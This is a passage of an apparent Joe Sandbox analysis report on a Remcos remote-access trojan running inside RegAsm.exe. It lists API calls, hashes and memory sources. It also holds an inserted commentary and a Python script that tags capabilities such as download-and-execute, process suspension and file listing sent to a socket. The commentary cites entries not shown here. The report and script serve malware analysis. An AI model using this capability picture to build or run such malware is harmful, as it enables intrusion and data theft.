                                                 • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$CloseDataOpen
                                                • String ID:
                                                • API String ID: 2058664381-0
                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                APIs
                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandleOpenResume
                                                • String ID:
                                                • API String ID: 3614150671-0
                                                • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                APIs
                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandleOpenSuspend
                                                • String ID:
                                                • API String ID: 1999457699-0
                                                • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
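The function entries above document several Remcos capabilities purely through API combinations and argument constants: URLDownloadToFileW followed by ShellExecuteW (download-and-execute, ref 004070DB/00406FF7), FindFirstFileW/FindNextFileW feeding a send() subcall (directory listing pushed to the C2 socket), SystemParametersInfoW with action 0x14 (SPI_SETDESKWALLPAPER) next to the Control Panel\Desktop registry strings (wallpaper change), and OpenProcess with access mask 0x800 (PROCESS_SUSPEND_RESUME) paired with NtSuspendProcess/NtResumeProcess. The IsDebuggerPresent + SetUnhandledExceptionFilter + UnhandledExceptionFilter triple, present in both the 00400000 and 10000000 modules, is the MSVC runtime's own failure-reporting path rather than anti-debugging, and should not be read as an evasion indicator. The following script is an added example, not Joe Sandbox code and not part of this report: it parses the plain-text layout of these "APIs" entries and tags each function with the capability its calls imply. The sample input is constructed from the API lines shown above (fuzzy hashes shortened), and the tag names are this example's own labels, not Joe Sandbox signature names.

```python
import re
from dataclasses import dataclass, field

# One API line as printed in the report. The three shapes seen above are:
#   • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
#   • IsDebuggerPresent.KERNEL32 ref: 0043BC69
#     • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,...), ref: 00404B36
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")
HASH_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")  # last line of every entry

SPI_SETDESKWALLPAPER = 0x14     # SystemParametersInfoW action at ref 0041CB68
PROCESS_SUSPEND_RESUME = 0x800  # OpenProcess access mask at refs 0041BBA5 / 0041BBD1


@dataclass
class Call:
    api: str
    module: str
    args: list
    subcall: bool  # True when the report marks the line "Part of subcall function"


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)


def _arg(token):
    """8-digit hex constants become ints; '?' and literal strings stay text."""
    t = token.strip()
    return int(t, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", t) else t


def parse_report(text):
    """Split the plain-text report into one FuncRecord per function entry."""
    recs, cur = [], FuncRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], m["mod"], args, bool(m["sub"])))
            continue
        m = STRING_RE.match(line)
        if m and m["s"].strip():
            cur.strings.extend(m["s"].split("$"))  # the report joins strings with '$'
        elif HASH_RE.match(line):
            recs.append(cur)
            cur = FuncRecord()
    return recs


def _direct(rec, api, arg0=None):
    """API called by the function itself (not via a subcall), optionally with a given first argument."""
    return any(c.api == api and not c.subcall and (arg0 is None or (c.args and c.args[0] == arg0))
               for c in rec.calls)


def _any(rec, api):
    return any(c.api == api for c in rec.calls)


# Capability rules. The names are this example's labels, not Joe Sandbox signature names.
RULES = {
    "download_and_execute": lambda r: _direct(r, "URLDownloadToFileW") and _direct(r, "ShellExecuteW"),
    "set_wallpaper": lambda r: _direct(r, "SystemParametersInfoW", SPI_SETDESKWALLPAPER)
                               or "Control Panel\\Desktop" in r.strings,
    "suspend_process": lambda r: _direct(r, "OpenProcess", PROCESS_SUSPEND_RESUME)
                                 and _direct(r, "NtSuspendProcess"),
    "resume_process": lambda r: _direct(r, "OpenProcess", PROCESS_SUSPEND_RESUME)
                                and _direct(r, "NtResumeProcess"),
    "enumerate_files_to_socket": lambda r: _direct(r, "FindFirstFileW") and _any(r, "send"),
    # MSVC runtime failure handler: IsDebuggerPresent here is CRT plumbing, not anti-debugging.
    "crt_failure_handler": lambda r: all(_direct(r, a) for a in
        ("IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter")),
}


def tag(rec):
    return sorted(name for name, pred in RULES.items() if pred(rec))


def tag_report(text):
    return [tag(r) for r in parse_report(text)]


# CONSTRUCTED input: five entries in the report's own layout, copied from the
# API lines shown above with the fuzzy hashes shortened.
SAMPLE = r"""APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
• Instruction Fuzzy Hash: 5261B371
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• String ID: XPG$XPG
• Instruction Fuzzy Hash: 2D21A431
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• Instruction Fuzzy Hash: D7118472
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
• NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
• CloseHandle.KERNEL32(00000000), ref: 0041BBBB
• Instruction Fuzzy Hash: 98D05E36
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
• Instruction Fuzzy Hash: 0431D374
"""

if __name__ == "__main__":
    for rec, tags in zip(parse_report(SAMPLE), tag_report(SAMPLE)):
        print(", ".join(c.api for c in rec.calls), "->", tags or ["untagged"])
```

Run it against a saved copy of this report section instead of SAMPLE to triage the whole listing: entries that only hit crt_failure_handler (or nothing) are runtime and locale boilerplate and can be skipped, and the argument constants matter as much as the API names, since SystemParametersInfoW or OpenProcess alone say little until you see 0x14 or 0x800 in the first argument.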
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID: MZ@
                                                • API String ID: 2325560087-2978689999
                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: JD
                                                • API String ID: 1084509184-2669065882
                                                • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2299586839-2904428671
                                                • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                • String ID:
                                                • API String ID: 1661935332-0
                                                • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                • String ID:
                                                • API String ID: 2692324296-0
                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                APIs
                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                Memory Dump Source
